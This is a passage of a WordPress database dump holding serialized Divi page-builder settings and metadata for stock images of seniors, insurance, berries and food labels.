4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:3:\"but\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_44e56d4d8e0f1a6557042a3f1e563fb9\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_80fc75476c3f79da417bc1f77f1c669d\";a:7:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_code_e506abe2c72c9efaf068d1a321b0116c\";a:4:{s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_1a3dbcc089ec71d29495ceee4a723bd2\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_0a9bfa8f334d4530752377dbd06c516d\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_567406854b7d6acddd943c65061657e2\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:43:\"dsm_button_ee53b056f88fc978c14910f251901370\";a:8:{s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:3:\"but\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:54:\"dsm_perspective_image_174226a51eb264433fcf840b3fb363c5\";a:6:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_5534bc04f81f113600f8ae7a49bb81f4\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_aca01d6c7c64e0cba2590ffcbbc2cf85\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:50:\"dsm_typing_effect_5b86cd3b8a2b4fc23decbd41fdaab77a\";a:8:{s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:46:\"et_pb_section_bf48a22be0658f0505a867fc635fb16c\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:42:\"et_pb_row_9f06b83474282045e5df55e01bb1dd4d\";a:5:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_5eff6cba2d4bb76e0c74a487bf2128b3\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:44:\"et_pb_image_ed9711cf7ffd371f7d785f45dc31bc60\";a:6:{s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:45:\"et_pb_column_0e74363fb47569a15631ef625ac86e4b\";a:3:{s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_e2d98dc788ea78f3425d44ecb7f6de24\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}s:43:\"et_pb_text_f1c78f3128ba76d9f1efc6e3bc7e2304\";a:9:{s:4:\"glde\";a:10:{s:14:\"text_font_size\";s:2:\"14\";s:19:\"text_letter_spacing\";s:3:\"0px\";s:16:\"text_line_height\";s:5:\"1.7em\";s:16:\"header_font_size\";s:4:\"30px\";s:21:\"header_letter_spacing\";s:3:\"0px\";s:18:\"header_line_height\";s:3:\"1em\";s:15:\"background_size\";s:5:\"cover\";s:19:\"background_position\";s:6:\"center\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:16:\"background_blend\";s:6:\"normal\";}s:4:\"foop\";b:1;s:4:\"tesh\";b:1;s:4:\"cuma\";b:1;s:4:\"mawi\";b:1;s:4:\"bosh\";b:1;s:3:\"pos\";b:1;s:5:\"mapac\";b:1;s:4:\"anim\";b:1;}}}'),(2620,745,'_edit_lock','1680567009:1'),(182,55,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:37:\"2023/03/Senior-and-nurse-1000X667.jpg\";s:8:\"filesize\";i:349492;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"Senior-and-nurse-1000X667-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25804;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"Senior-and-nurse-1000X667-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20982;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"Senior-and-nurse-1000X667-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56158;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:37:\"Senior-and-nurse-1000X667-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30508;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:37:\"Senior-and-nurse-1000X667-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31479;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:37:\"Senior-and-nurse-1000X667-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39201;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:37:\"Senior-and-nurse-1000X667-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38678;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:37:\"Senior-and-nurse-1000X667-980x654.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75929;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:37:\"Senior-and-nurse-1000X667-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35288;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:26:\"Closeup of a support hands\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:13:\"Rawpixel Ltd.\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:26:\"Closeup of a support hands\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:45:{i:0;s:5:\"adult\";i:1;s:4:\"aged\";i:2;s:5:\"aging\";i:3;s:3:\"aid\";i:4;s:7:\"america\";i:5;s:8:\"american\";i:6;s:10:\"assistance\";i:7;s:9:\"beautiful\";i:8;s:4:\"care\";i:9;s:9:\"caregiver\";i:10;s:9:\"caucasian\";i:11;s:7:\"closeup\";i:12;s:6:\"doctor\";i:13;s:7:\"elderly\";i:14;s:7:\"english\";i:15;s:8:\"european\";i:16;s:6:\"female\";i:17;s:6:\"german\";i:18;s:5:\"hands\";i:19;s:6:\"health\";i:20;s:4:\"help\";i:21;s:13:\"holding hands\";i:22;s:8:\"hospital\";i:23;s:8:\"intimate\";i:24;s:4:\"lady\";i:25;s:4:\"love\";i:26;s:6:\"mature\";i:27;s:12:\"mature adult\";i:28;s:5:\"nurse\";i:29;s:3:\"old\";i:30;s:7:\"old age\";i:31;s:6:\"people\";i:32;s:6:\"pretty\";i:33;s:7:\"retired\";i:34;s:10:\"retirement\";i:35;s:7:\"russian\";i:36;s:6:\"senior\";i:37;s:12:\"senior adult\";i:38;s:7:\"support\";i:39;s:8:\"together\";i:40;s:3:\"two\";i:41;s:5:\"visit\";i:42;s:9:\"westerner\";i:43;s:5:\"white\";i:44;s:5:\"woman\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"82\";s:8:\"quantity\";d:90;s:4:\"webp\";i:0;}}'),(179,54,'_edit_last','3'),(180,54,'_edit_lock','1679247304:3'),(181,55,'_wp_attached_file','2023/03/Senior-and-nurse-1000X667.jpg'),(168,3,'_edit_lock','1680358076:3'),(183,54,'_thumbnail_id','55'),(184,54,'_et_post_bg_color','#ffffff'),(185,54,'_et_post_bg_layout','light'),(186,54,'_et_pb_show_title','on'),(187,54,'_et_pb_post_hide_nav','default'),(188,54,'_et_pb_page_layout','et_right_sidebar'),(189,54,'_et_pb_side_nav','off'),(195,58,'_wp_attached_file','2023/03/Seniors-with-their-family-1000x667-1.jpg'),(196,58,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:48:\"2023/03/Seniors-with-their-family-1000x667-1.jpg\";s:8:\"filesize\";i:471277;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:48:\"Seniors-with-their-family-1000x667-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33856;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:48:\"Seniors-with-their-family-1000x667-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24215;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:48:\"Seniors-with-their-family-1000x667-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89418;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:48:\"Seniors-with-their-family-1000x667-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42443;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:48:\"Seniors-with-their-family-1000x667-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44310;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:48:\"Seniors-with-their-family-1000x667-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57634;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:48:\"Seniors-with-their-family-1000x667-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52502;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:48:\"Seniors-with-their-family-1000x667-1-980x654.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:123188;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:48:\"Seniors-with-their-family-1000x667-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51886;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:82:\"Portrait of senior and young couples with their children looking at camera at home\";s:17:\"created_timestamp\";s:10:\"1362036841\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"35\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:13:\"Family of six\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:50:{i:0;s:6:\"people\";i:1;s:6:\"family\";i:2;s:6:\"person\";i:3;s:7:\"company\";i:4;s:5:\"group\";i:5;s:6:\"couple\";i:6;s:8:\"daughter\";i:7;s:6:\"female\";i:8;s:5:\"woman\";i:9;s:9:\"lifestyle\";i:10;s:5:\"happy\";i:11;s:7:\"smiling\";i:12;s:5:\"adult\";i:13;s:6:\"pretty\";i:14;s:5:\"young\";i:15;s:9:\"Caucasian\";i:16;s:6:\"mother\";i:17;s:3:\"mom\";i:18;s:6:\"parent\";i:19;s:3:\"man\";i:20;s:4:\"male\";i:21;s:6:\"father\";i:22;s:3:\"dad\";i:23;s:8:\"handsome\";i:24;s:7:\"husband\";i:25;s:4:\"wife\";i:26;s:10:\"generation\";i:27;s:3:\"son\";i:28;s:6:\"senior\";i:29;s:4:\"aged\";i:30;s:5:\"older\";i:31;s:6:\"mature\";i:32;s:7:\"elderly\";i:33;s:8:\"together\";i:34;s:5:\"child\";i:35;s:9:\"childhood\";i:36;s:4:\"girl\";i:37;s:3:\"boy\";i:38;s:10:\"grandchild\";i:39;s:11:\"grandparent\";i:40;s:11:\"grandfather\";i:41;s:11:\"grandmother\";i:42;s:4:\"home\";i:43;s:6:\"seated\";i:44;s:11:\"comfortable\";i:45;s:9:\"embracing\";i:46;s:6:\"casual\";i:47;s:8:\"cheerful\";i:48;s:3:\"row\";i:49;s:4:\"line\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"77\";s:8:\"quantity\";d:80;s:4:\"webp\";i:0;}}'),(194,57,'_edit_lock','1679247336:3'),(193,57,'_edit_last','3'),(197,57,'_thumbnail_id','58'),(207,61,'_edit_lock','1679247522:3'),(206,61,'_edit_last','3'),(200,57,'_et_post_bg_color','#ffffff'),(201,57,'_et_post_bg_layout','light'),(202,57,'_et_pb_show_title','on'),(203,57,'_et_pb_post_hide_nav','default'),(204,57,'_et_pb_page_layout','et_right_sidebar'),(205,57,'_et_pb_side_nav','off'),(208,62,'_wp_attached_file','2023/03/Accidental-Death-Benefit-And-Dismemberment-add-insurance-1000x667-1.jpg'),(209,62,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:79:\"2023/03/Accidental-Death-Benefit-And-Dismemberment-add-insurance-1000x667-1.jpg\";s:8:\"filesize\";i:501643;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:79:\"Accidental-Death-Benefit-And-Dismemberment-add-insurance-1000x667-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32064;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:79:\"Accidental-Death-Benefit-And-Dismemberment-add-insurance-1000x667-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23550;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:79:\"Accidental-Death-Benefit-And-Dismemberment-add-insurance-1000x667-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86993;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:79:\"Accidental-Death-Benefit-And-Dismemberment-add-insurance-1000x667-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39714;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:79:\"Accidental-Death-Benefit-And-Dismemberment-add-insurance-1000x667-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41981;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:79:\"Accidental-Death-Benefit-And-Dismemberment-add-insurance-1000x667-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54912;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:79:\"Accidental-Death-Benefit-And-Dismemberment-add-insurance-1000x667-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54104;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:79:\"Accidental-Death-Benefit-And-Dismemberment-add-insurance-1000x667-1-980x654.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:121051;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:79:\"Accidental-Death-Benefit-And-Dismemberment-add-insurance-1000x667-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49423;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"20\";s:6:\"credit\";s:32:\"Vitalii Vodolazskyi - stock.adob\";s:6:\"camera\";s:7:\"SLT-A65\";s:7:\"caption\";s:62:\"Accidental Death Benefit And Dismemberment ad&amp;d insurance.\";s:17:\"created_timestamp\";s:10:\"1527785073\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"30\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:4:\"0.25\";s:5:\"title\";s:62:\"Accidental Death Benefit And Dismemberment ad&amp;d insurance.\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:14:{i:0;s:9:\"insurance\";i:1;s:10:\"accidental\";i:2;s:5:\"death\";i:3;s:7:\"benefit\";i:4;s:13:\"dismemberment\";i:5;s:3:\"add\";i:6;s:4:\"work\";i:7;s:8:\"business\";i:8;s:7:\"injured\";i:9;s:6:\"policy\";i:10;s:10:\"conceptual\";i:11;s:6:\"safety\";i:12;s:7:\"service\";i:13;s:6:\"injury\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"77\";s:8:\"quantity\";d:80;s:4:\"webp\";i:0;}}'),(210,61,'_thumbnail_id','62'),(220,65,'_edit_lock','1679247436:3'),(219,65,'_edit_last','3'),(213,61,'_et_post_bg_color','#ffffff'),(214,61,'_et_post_bg_layout','light'),(215,61,'_et_pb_show_title','on'),(216,61,'_et_pb_post_hide_nav','default'),(217,61,'_et_pb_page_layout','et_right_sidebar'),(218,61,'_et_pb_side_nav','off'),(221,66,'_wp_attached_file','2023/03/Blueberries-and-strawberries-background-1000x667-1.jpg'),(222,66,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:62:\"2023/03/Blueberries-and-strawberries-background-1000x667-1.jpg\";s:8:\"filesize\";i:739558;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"Blueberries-and-strawberries-background-1000x667-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52164;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"Blueberries-and-strawberries-background-1000x667-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36118;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"Blueberries-and-strawberries-background-1000x667-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155469;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:62:\"Blueberries-and-strawberries-background-1000x667-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67599;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:62:\"Blueberries-and-strawberries-background-1000x667-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72512;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:62:\"Blueberries-and-strawberries-background-1000x667-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100047;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:62:\"Blueberries-and-strawberries-background-1000x667-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98363;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:62:\"Blueberries-and-strawberries-background-1000x667-1-980x654.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:216089;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:62:\"Blueberries-and-strawberries-background-1000x667-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85498;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"10\";s:6:\"credit\";s:25:\"Nikolay - stock.adobe.com\";s:6:\"camera\";s:10:\"NIKON D610\";s:7:\"caption\";s:50:\"Blueberries and strawberries background. Top view.\";s:17:\"created_timestamp\";s:10:\"1595625935\";s:9:\"copyright\";s:26:\"Nikolay           Zaiarnyi\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:40:\"Blueberries and strawberries background.\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:35:{i:0;s:11:\"agriculture\";i:1;s:12:\"antioxidants\";i:2;s:10:\"background\";i:3;s:5:\"berry\";i:4;s:8:\"bilberry\";i:5;s:12:\"blackberries\";i:6;s:10:\"blackberry\";i:7;s:4:\"blue\";i:8;s:11:\"blueberries\";i:9;s:9:\"blueberry\";i:10;s:9:\"delicious\";i:11;s:7:\"dessert\";i:12;s:4:\"diet\";i:13;s:6:\"eating\";i:14;s:4:\"food\";i:15;s:5:\"fresh\";i:16;s:5:\"fruit\";i:17;s:7:\"healthy\";i:18;s:5:\"juicy\";i:19;s:7:\"natural\";i:20;s:6:\"nature\";i:21;s:9:\"nutrition\";i:22;s:10:\"nutritious\";i:23;s:7:\"organic\";i:24;s:6:\"picked\";i:25;s:3:\"raw\";i:26;s:3:\"red\";i:27;s:4:\"ripe\";i:28;s:5:\"seeds\";i:29;s:12:\"strawberries\";i:30;s:6:\"summer\";i:31;s:5:\"sweet\";i:32;s:5:\"tasty\";i:33;s:10:\"vegetarian\";i:34;s:7:\"vitamin\";}}s:7:\"optimus\";a:3:{s:6:\"profit\";s:2:\"78\";s:8:\"quantity\";d:70;s:4:\"webp\";i:0;}}'),(223,65,'_thumbnail_id','66'),(233,68,'_edit_lock','1679247506:3'),(232,68,'_edit_last','3'),(226,65,'_et_post_bg_color','#ffffff'),(227,65,'_et_post_bg_layout','light'),(228,65,'_et_pb_show_title','on'),(229,65,'_et_pb_post_hide_nav','default'),(230,65,'_et_pb_page_layout','et_right_sidebar'),(231,65,'_et_pb_side_nav','off'),(234,69,'_wp_attached_file','2023/03/Woman-looking-at-expiration-date-on-food-1000x667-1.jpg'),(235,69,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1000;s:6:\"height\";i:667;s:4:\"file\";s:63:\"2023/03/Woman-looking-at-expiration-date-on-food-1000x667-1.jpg\";s:8:\"filesize\";i:388079;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:63:\"Woman-looking-at-expiration-date-on-food-1000x667-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34266;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:63:\"Woman-looking-at-expiration-date-on-food-1000x667-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26674;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:63:\"Woman-looking-at-expiration-date-on-food-1000x667-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78903;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:63:\"Woman-looking-at-expiration-date-on-food-1000x667-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40548;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:63:\"Woman-looking-at-expiration-date-on-food-1000x667-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42811;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:63:\"Woman-looking-at-expiration-date-on-food-1000x667-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54360;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:63:\"Woman-looking-at-expiration-date-on-food-1000x667-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53479;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:63:\"Woman-looking-at-expiration-date-on-food-1000x667-1-980x654.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:106347;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:63:\"Woman-looking-at-expiration-date-on-food-1000x667-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48648;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.7\";s:6:\"credit\";s:25:\"g